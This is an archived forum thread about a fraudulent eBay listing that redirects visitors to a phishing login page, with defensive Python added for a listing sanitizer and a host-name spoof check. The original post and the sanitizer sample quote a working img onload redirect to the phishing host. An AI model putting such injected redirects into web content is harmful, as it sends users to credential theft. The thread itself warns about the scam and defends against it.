Scamming Ebay Ratbastards from Hell

polksda
polksda Posts: 716
edited April 2 in Clubhouse Archives
These slimeballs are good.... really good.

Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).

ebayscam1.gif


Being curious, I clicked on the auction link and ended up at the page below:

ebayscam2.gif


Now, this took me aback for a second, and then I saw the URL in the address bar.

The **** have programmed a redirect into their auction text.

I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:

<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html">

Hopefully Ebay will implement some parsing to eliminate this loophole.

Be careful out there folks...

[And yes, I reported it to Ebay immediately]
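The "parsing" the post hopes eBay will add is an allowlist sanitizer run over seller-supplied listing HTML before it is stored or rendered: keep a short list of harmless tags and attributes, and drop everything else, which includes every on* event-handler attribute and any URL whose scheme is not http(s). The Python below is an added example written for this thread, not eBay's code; the tag and attribute allowlist is this example's own assumption, and the sample listing fragment is constructed around the tag quoted in the post.

```python
# Added example: allowlist sanitizer for seller-supplied listing HTML.
# Not eBay's code; the tag/attribute allowlist is this example's assumption.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "ul", "ol", "li", "img", "a"}
ALLOWED_ATTRS = {"img": {"src", "alt", "width", "height"}, "a": {"href"}}
URL_ATTRS = {"src", "href"}
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}  # their contents are dropped along with the tag


def url_is_safe(value):
    """Only plain http(s) URLs survive; javascript:, data: and friends are dropped."""
    return urlsplit(value.strip()).scheme.lower() in ("http", "https")


class ListingSanitizer(HTMLParser):
    """Re-emits only allowlisted tags and attributes; everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # audit trail: what was removed and why
        self.skipping = None  # set while inside a dropped <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag <{tag}>")
            if tag in RAW_TEXT_TAGS:
                self.skipping = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):            # onload, onerror, onclick, ...
                self.dropped.append(f"<{tag}> event handler {name}")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"<{tag}> attribute {name}")
            elif name in URL_ATTRS and not url_is_safe(value):
                self.dropped.append(f"<{tag}> unsafe {name}={value!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(escape(data))


def sanitize_listing(html):
    """Return (clean_html, dropped) for a seller-supplied fragment."""
    parser = ListingSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample: the tag quoted in the post plus ordinary formatting
# and two other things a sanitizer must refuse.
SAMPLE = ('<p>Rare <b>CD</b>, mint.</p>'
          '<img src=http://pics.ebaystatic.com/aw/pics/s.gif '
          'onload=location="http://holaamigo.50megs.com/main.html">'
          '<a href="javascript:void(0)">click</a>'
          '<script>alert(1)</script>')

if __name__ == "__main__":
    clean, dropped = sanitize_listing(SAMPLE)
    print(clean)     # the <img> survives with only its src; the onload is gone
    print(dropped)
```

The parser, not a regular expression, is what makes the unquoted `onload=location="..."` form in the post harmless: html.parser tokenises it as an attribute named onload, so it is caught by the same rule as `onload="..."` would be. Anything the sanitizer removes is returned in `dropped`, which is worth logging, since a seller whose listings keep losing event handlers is a useful signal on its own.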

Comments

  • wingnut4772
    wingnut4772 Posts: 7,519
    edited April 2006
    Wow. That's actually pretty smart on their part. I hope they get caught.
    Sharp Elite 70
    Anthem D2V 3D
    Parasound 5250
    Parasound HCA 1000 A
    Parasound HCA 1000
    Oppo BDP 95
    Von Schweikert VR4 Jr R/L Fronts
    Von Schweikert LCR 4 Center
    Totem Mask Surrounds X4
    Hsu ULS-15 Quad Drive Subwoofers
    Sony PS3
    Squeezebox Touch

    Polk Atrium 7s on the patio just to keep my foot in the door.
  • Shizelbs
    Shizelbs Posts: 7,433
    edited April 2006
    Have fun in prison ****.
  • neomagus00
    neomagus00 Posts: 3,899
    edited April 2006
    i've never actually seen phishing in action... thanks for the tip!
    It's not good, very fundamentally simply not good. - geolemon

    "Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs
  • polksda
    polksda Posts: 716
    edited April 2006
    Shizelbs wrote:
    Have fun in prison ****.

    I doubt that anyone will be caught, let alone be punished.

    If you look at the URL, it's hosted at 50megs.com, a free hosting site. These **** set up an account, use it to glean information until the account is shut down, then they move on to another host.

    I've reported email-based phishing scams to several free hosts out there that have been hosting these criminals, and the free hosts don't care. I suspect that some of the free hosts (or staff members) are in cahoots, given the lack of action...
  • bobman1235
    bobman1235 Posts: 10,822
    edited April 2006
Email based phishing is one thing. Actually hosting it on eBay's site might piss them off to make them pursue it. How far they'll get is another story, but technically they could get the FBI involved.
    If you will it, dude, it is no dream.
  • Shizelbs
    Shizelbs Posts: 7,433
    edited April 2006
    polksda wrote:
    I doubt that anyone will be caught, let alone be punished.

    I doubt it also, but you never know. I certainly hope so though.
  • MacLeod
    MacLeod Posts: 14,358
    edited April 2006
    Forgive my obtuseness, but is the scam where you click on the auction and are directed to their phony login screen and when you try to log in they have your name and password?
    polkaudio sound quality competitor since 2005
    MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
    08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st

    polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D
  • Tour2ma
    Tour2ma Posts: 10,177
    edited April 2006
    EDIT: That's pretty much it, Mac...

    Love how the scammers never have learned how to spell...

    Anyone else been getting those "ebay" phish-mails that look like an ebay message and start with something along the lines of:
    "I need to hear from you about the 'such and such' that I won in your auction #123456."
    More later,
    Tour...
    Vox Copuli
    Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb

    "Death doesn't come with a Uhaul." - Dennis Gardner

    "It's easy to get lost in price vs performance vs ego vs illusion." - doro
    "There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD
  • MacLeod
    MacLeod Posts: 14,358
    edited April 2006
    Yikes!

I've had one of those only once so far back when I was on AOL a couple years ago. I got an email telling me my AOL account was about to be canceled due to a credit card being declined and I had to re-enter all my stats. The link took me to a website that looked identical to AOL's and asked for passwords, credit card numbers and the whole shebang!

I didn't trust it so I called AOL and asked them and she said it was definitely a scam and got all the info and said their security department would look into it.

It looks like they're getting better with these scams. I wonder how many poor saps got suckered into this one?
    polkaudio sound quality competitor since 2005
    MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
    08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st

    polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D
  • Polkersince85
    Polkersince85 Posts: 2,883
    edited April 2006
If you have any doubts, change your passwords to make things hard for them. Stay ahead of them and watch the URLs.
    >
    >
    >This message has been scanned by the NSA and found to be free of harmful intent.<
  • neomagus00
    neomagus00 Posts: 3,899
    edited April 2006
    even the URLs aren't a sure thing, unfortunately... a clever programmer can hide those, too, which is really frightening...

    i personally have all my websites remember me with a cookie (with appropriate security settings, naturally)... that way, it logs me in automatically, and if i see another login screen after that it makes me suspicious by default...
    It's not good, very fundamentally simply not good. - geolemon

    "Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs
  • Polk65
    Polk65 Posts: 1,405
    edited April 2006
    The sad part is, it was probably done from an internet cafe via proxy.

    It's a bold scam and a reminder not to surf the internet high. :)
  • Moreants
    Moreants Posts: 70
    edited April 2006
I keep this as a notepad file on my desktop. Just open the file and copy and paste this text in the url box to confirm the actual site.


    javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
    I remember when 'broadband' meant The Go-Go's.
  • mldennison
    mldennison Posts: 307
    edited April 2006
that's a great little piece of code! thanks!
  • Tour2ma
    Tour2ma Posts: 10,177
    edited April 2006
That is pretty cool... I wonder why ebay and other sites that are heavily spoofed don't advertise this code's existence?

    On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that... ;)
    More later,
    Tour...
    Vox Copuli
    Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb

    "Death doesn't come with a Uhaul." - Dennis Gardner

    "It's easy to get lost in price vs performance vs ego vs illusion." - doro
    "There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD
  • bobman1235
    bobman1235 Posts: 10,822
    edited April 2006
    Tour2ma wrote:
    On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that... ;)

    :confused: It's just the root (the www.polkaudio.com part) that is supposed to be compared... I get that being the same... so Polk isn't a possible spoof. It's just checking the host name, not the entire URL.
    If you will it, dude, it is no dream.
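The bookmarklet Moreants posted shows two strings, the host name the browser actually connected to and the full address, and leaves the comparison to the reader; bobman1235's point is that only the host name matters. As an added example that is not part of the thread, the Python below does that same comparison offline so it can be tested against the addresses that come up in this thread: the trusted-domain set is this example's own assumption (eBay's real list is longer), and the sample addresses are constructed, including the one from the first post.

```python
# Added example: the bookmarklet's host-name comparison as a plain function.
# Not from the thread; the trusted-domain set is this example's assumption.
from urllib.parse import urlsplit


def server_name(href):
    """What the bookmarklet labels 'The actual URL': scheme://hostname/."""
    parts = urlsplit(href)
    return f"{parts.scheme}://{(parts.hostname or '').lower()}/"


def host_matches(href, trusted_domains):
    """True if the URL's host is a trusted domain or a subdomain of one.

    Only the host name is compared, never the path or query, and the match is
    on whole labels, so 'notebay.com' does not pass for 'ebay.com'.
    """
    host = (urlsplit(href).hostname or "").lower().rstrip(".")
    for trusted in trusted_domains:
        trusted = trusted.lower().rstrip(".")
        if host == trusted or host.endswith("." + trusted):
            return True
    return False


def spoof_report(href, trusted_domains):
    """The bookmarklet's message, with the verdict made for the reader."""
    verdict = "host is trusted" if host_matches(href, trusted_domains) else "possible spoof"
    return f"actual server: {server_name(href)}  address: {href}  -> {verdict}"


TRUSTED = {"ebay.com", "ebaystatic.com"}   # assumption for this example

# Constructed addresses: the one from the first post, plus forms a host-only
# check must get right.
SAMPLES = [
    "http://www.ebay.com/item/123",
    "http://pics.ebaystatic.com/aw/pics/s.gif",
    "http://holaamigo.50megs.com/main.html",
    "http://holaamigo.50megs.com/www.ebay.com/signin",  # trusted name only in the path
    "http://notebay.com/",                               # shares a suffix, different host
]

if __name__ == "__main__":
    for href in SAMPLES:
        print(spoof_report(href, TRUSTED))
```

Tour2ma's observation that the bookmarklet calls the Polk page a "possible spoof" is the other half of this: the bookmarklet can only show you the host, and the decision still needs a list of hosts you actually trust, which is why `host_matches` takes one.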
  • 1996blackmax
    1996blackmax Posts: 2,436
    edited April 2006
    These kind of people really get under my skin......
    Alpine: CDA-7949
    Alpine: PXA-H600
    Alpine: CHA-S624, KCA-420i, KCA-410C
    Rainbow: CS 265 Profi Phase Plug / SL 165
    ARC Audio: 4150-XXK / 1500v1-XXK
    JL Audio: 10W6v2 (x2)
    KnuKonceptz
    Second Skin